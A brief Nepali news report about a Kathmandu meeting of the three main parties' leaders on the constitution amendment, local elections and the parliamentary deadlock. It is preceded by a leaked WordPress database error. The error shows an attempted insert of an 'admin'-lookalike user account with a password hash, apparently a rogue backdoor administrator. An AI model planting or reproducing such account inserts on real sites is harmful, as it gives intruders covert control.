WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBq.dQb4BzdbMBvQfzI3o6WYmRUSxw.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-12 21:57:48', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १३-
संविधान संशोधन प्रस्ताव, स्थानीय निर्वाचन र संसद्को गतिरोधका विषयमा प्रमुख तीन दलका शीर्ष नेताबीच आज सिंहदरबारमा बैठक सुरु भएको छ ।
प्रधानमन्त्री तथा मन्त्रिपरिषद्को कार्यालयमा प्रधानमन्त्री एवम् नेकपा (माओवादी केन्द्र)का अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ सहितका नेताबीच छलफल सुरु भएको हो ।
सरकारले संविधान संशोधन विधेयक व्यवस्थापिका–संसद्मा दर्ता गरेपछि प्रमुख प्रतिपक्षी नेकपा (एमाले)ले संसद् अवरोध गर्दै आएको छ । -रासस